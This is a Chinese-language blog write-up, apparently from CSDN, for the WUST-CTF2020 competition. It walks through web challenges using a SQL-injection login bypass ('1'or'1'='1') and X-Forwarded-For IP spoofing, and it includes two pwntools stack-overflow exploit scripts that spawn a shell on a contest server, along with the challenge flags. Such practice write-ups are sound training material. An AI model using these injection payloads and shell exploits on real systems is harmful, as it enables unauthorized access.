WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP

最新推荐文章于 2024-04-05 05:33:02 发布
VIP文章 最新推荐文章于 2024-04-05 05:33:02 发布
阅读量3.4k 收藏 6
点赞数 4
分类专栏: WCTF2020 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45461609/article/details/105166662
版权

WUST-CTF2020

Web

check in

修改maxlength,删除按钮的disabled,输入作者名52HeRtz即可登录
收到窗口信息一个博客地址,进入。
Ctrl+U查看源码,在末尾发现一半flag
在这里插入图片描述
继续找在“远古的博客”中找到另一半
在这里插入图片描述

wctf2020{can_y0u_can_a_can_a5_a_c@nner_can_Can_@_can}

admin(不会web勉强做出)

用户名:

admin

JSP万能密码:

1'or'1'='1

登录后页面提示,必须本地ip才能访问,想到用抓包添加XFF来伪造IP
在这里插入图片描述
Action->Send to Repeater->Go
在这里插入图片描述
页面提示用GET传参,停止抓包,在原网址末尾添加

?ais=520

抓包,重复上面的操作,得到新提示,用POST传参
在这里插入图片描述
与GET类似,用hackbar POST

wust=1314

后得到提示离flag很近了,得到一串字符

4dz  aste.ubuntu.com/p/    https://p  Rqr  cSf2

在这里插入图片描述
将字符串HTML解码
在这里插入图片描述
将网址拼接起来得:

https://paste.ubuntu.com/p/cSf24dzRqr

进入得

d2N0ZjIwMjB7bjB3X3lvdV9rbjB3X3RoZV9iYXNpY18wZl9zcWxfYW5kX2h0dHB9

base64解码得:

wctf2020{n0w_you_kn0w_the_basic_0f_sql_and_http}

PWN

getshell

没什么好说的,真·签到题

from pwn import*
#r=process('./getshell')
r=remote('47.97.40.187',12333)
sys_addr=0x0804851b
payload='a'*0x18+'a'*4+p32(sys_addr)
r.sendline(payload)
r.interactive()

wctf2020{E@sy_get_shel1}

getshell2

在这里插入图片描述
在这里插入图片描述
没有buf段让我们写入"/bin/sh",也没有现成的"/bin/sh"让我们使用,但是需要知道的是只需要"sh"便能getshell
注意到这里的read允许的最大长度为36,buf可容纳的长度为0x18=24,所以实现栈溢出覆盖返回地址的长度为28,所以只有8个字节能让我们写syscall
如果我们调用plt表的system函数地址,是需要继续压入一个system返回地址的,这两个地址的长度已经达到了8个字节,没有位置来输入"sh"的地址,所以想到程序里是否有call system直接让我们调用,这样就不用压入返回地址,就能省4个字节来压入"sh"的地址
在这里插入图片描述
在shell函数的汇编代码里找到了,所以将栈溢出后的返回地址直接改为0x08048529就行了,现在找"sh"的地址,用ROPgadget
在这里插入图片描述
exp:

from pwn import*
#r = process('./getshell-2')
r = remote('47.97.40.187', 12334)
sh_addr = 0x08048670
sys_addr = 0x08048529
payload = flat(['a'*28, sys_addr, sh_addr])
r.sendline(payload)
r.interactive()
最低0.47元/天 解锁文章
3nc0de
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次武汉科技大学ctf新手赛 wuctf2020
weixin_45677731的博客
04-03 1074
这两天做了一下武汉科技大学的新手赛,由于我是小萌新,难的题目都不会,下面是部分简单题的wp Misc 1.Space Club 打开之后是这样的,结合题目,估计可能是一堆空格之类的,用python看一下 运行结果如图,32即为空格的ASCII码,猜测10为分隔符,分隔符之间空格的不同数量即为有用信息,再提取 我这是空格数量+97后的结果,发现分隔符之间的空格数量,要么为6个,要么为12个,由...
WUST-CTF2020-WP
夏日 の blog
03-29 5219
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
BUUCTF—Crypto大帝的秘密武器(详解,2024年网络安全网络编程总结篇
最新发布
m0_58269520的博客
04-05 803
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
WUST-CTF2020
Ater的博客
07-10 141
Web checkin 打开题目链接 发现submit for flag是虚的不能点 查看元素找到了问题 首先是disable,然后是maxlength,dis删掉,长度改为10 把题目里的作者放上去提交 的到弹窗 然后进入网址 这里弹出字发现会出现wctf2020{ 查看元素 flag只有半个 再看看题目弹框:远古的博客 确实有一个远古的博客,得到了后半部分 Misc 比赛...
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3000
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
[WUSTCTF2020]朴实无华
Lumos427的博客
04-16 850
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "鎴戜笉缁忔剰
WUST Oracle数据库 实验一实验二-附件资源
03-05
WUST Oracle数据库 实验一实验二-附件资源
武科大OJ WUST OnlineJudge
02-27
OJ基础部分代码 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 ...
Physics-preparatory-course-2021:在弗罗茨瓦夫科技大学为外国人举办的物理讲座和练习
03-13
在2020/21Spring为外国人举办的物理讲座和练习。 有关更多信息,请参见。 大纲 简介-物理学统治世界-3.03.2021 (ZOOM) 运动现象-运动学-3.03.2021和5.03.2021 (ZOOM) 运动现象-动力学-10.03.2021和12.03....
传动系的检测与诊断--WUST.pdf
07-30
传动系的检测与诊断--WUST.pdf
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 946
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
[WUSTCTF2020]level4 wp
weixin_47158947的博客
08-06 840
1.ida打开 发现什么都没有, 但是注意struct ,left, right,data structure 用kail运行一下 先说了type1和type2,但是type3不给说,就是flag了, 主要是得知道1和2是那种遍历方式 肯定有一种是中序遍历! 这俩个开头都一样,那就没有先序遍历了 这道题的flag就是先序了,wuctf,后序遍历最后一个应该是w 然后根据自己学的知识获得flag wctf2020{This_IS_A_7reE} ...
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 430
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
BUU-CRYPTO2 密码学入门题:[WUSTCTF2020]佛说:只能四天
m0_75034448的博客
06-28 1491
题目 密文: 尊即寂修我劫修如婆愍闍嚤婆莊愍耨羅嚴是喼婆斯吶眾喼修迦慧迦嚩喼斯願嚤摩隸所迦摩吽即塞願修咒莊波斯訶喃壽祗僧若即亦嘇蜜迦須色喼羅囉咒諦若陀喃慧愍夷羅波若劫蜜斯哆咒塞隸蜜波哆咤慧聞亦吽念彌諸嘚嚴諦咒陀叻咤叻諦缽隸祗婆諦嚩阿兜宣囉吽色缽吶諸劫婆咤咤喼愍尊寂色缽嘚闍兜阿婆若叻般壽聞彌即念若降宣空陀壽愍嚤亦喼寂僧迦色莊壽吽哆尊僧喼喃壽嘚兜我空所吶般所即諸吽薩咤諸莊囉隸般咤色空咤亦喃亦色兜哆嘇亦隸空闍修眾哆咒婆菩迦壽薩塞宣嚩缽寂夷摩所修囉菩阿伏嘚宣嚩薩塞菩波吶波菩哆若慧愍蜜訶壽色咒兜摩缽摩諦劫諸陀即壽
[WUSTCTF2020]佛说:只能四天
shshss64的博客
09-24 3003
题目:尊即寂修我劫修如婆愍闍嚤婆莊愍耨羅嚴是喼婆斯吶眾喼修迦慧迦嚩喼斯願嚤摩隸所迦摩吽即塞願修咒莊波斯訶喃壽祗僧若即亦嘇蜜迦須色喼羅囉咒諦若陀喃慧愍夷羅波若劫蜜斯哆咒塞隸蜜波哆咤慧聞亦吽念彌諸嘚嚴諦咒陀叻咤叻諦缽隸祗婆諦嚩阿兜宣囉吽色缽吶諸劫婆咤咤喼愍尊寂色缽嘚闍兜阿婆若叻般壽聞彌即念若降宣空陀壽愍嚤亦喼寂僧迦色莊壽吽哆尊僧喼喃壽嘚兜我空所吶般所即諸吽薩咤諸莊囉隸般咤色空咤亦喃亦色兜哆嘇亦隸空闍修眾哆咒婆菩迦壽薩塞宣嚩缽寂夷摩所修囉菩阿伏嘚宣嚩薩塞菩波吶波菩哆若慧愍蜜訶壽色咒兜摩缽摩諦劫諸陀即壽所波咤聞如訶
CTF之CTF(夺旗赛)介绍
WenZhongxiang
10-06 3727
CTF攻防模式(Attack-Defense)是CTF比赛的一种模式,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。需要具备安全编程的能力,能够编写安全的代码等等。CTF比赛的知识范围大致分为:Web安全、PWN(二进制安全)、逆向工程、Misc(杂项)、Crypto(密码学安全)、网络安全。国外:ctftime.org 是对一个在国际上比较重要的赛事的做一些记录,而且会还会给出赛事的一些权重,以及对这种CTF 知名战队的一些排名。
CTF网络安全大赛 Crypto boom
热门推荐
艺博东的博客
05-11 1万+
CTF网络安全大赛 Crypto boom 1、Boom there have a game. 2、运行,输入cmd–>把下载好的文件,直接拖动进程序里 3、按回车 4、按任意键–>跳出md5密文 5、解析密文 md5:46e5efe6165a5afb361217446a2dbd01 md5在线解密破解,md5解密加密: https://www.cmd5.com/ 6、查询结果为en5oy 把输入en5oy–>回车–>请按任意键继续… 7、解方程 8、解得x=74,y=
CTF —— 网络安全大赛
ZL_1618的博客
07-14 747
前言随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛。
[WUSTCTF2020]level1
wp568的博客
09-02 166
i&1 – 按位与运算,取 2进制整数 i 的最低位,如果最低位是1 则得1,如果最低位是0 则得0。奇数 i 的最低位 是1,偶数i 的最低位 是0。1、将level1加后缀exe,用脱壳工具“Exeinfo PE万能查壳软件”发现没有壳,是64位的。output.txt文件中输出的数字,是通过i是奇数还是偶数,决定了输出的值。2、用反编译工具IDA(64)打开level1.exe。两个文件,一个level1,一个output.txt。看到flag字样,按F5查看伪代码。
如何使用restTemplate从https://ontoweb.wust.edu.cn/web-etl/platform/getDataDiy/getData中拿数据
07-16
以下是一个示例代码,演示如何使用RestTemplate从"https://ontoweb.wust.edu.cn/web-etl/platform/getDataDiy/getData"获取数据: ```java import org.springframework.http.HttpMethod; import org.spring...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值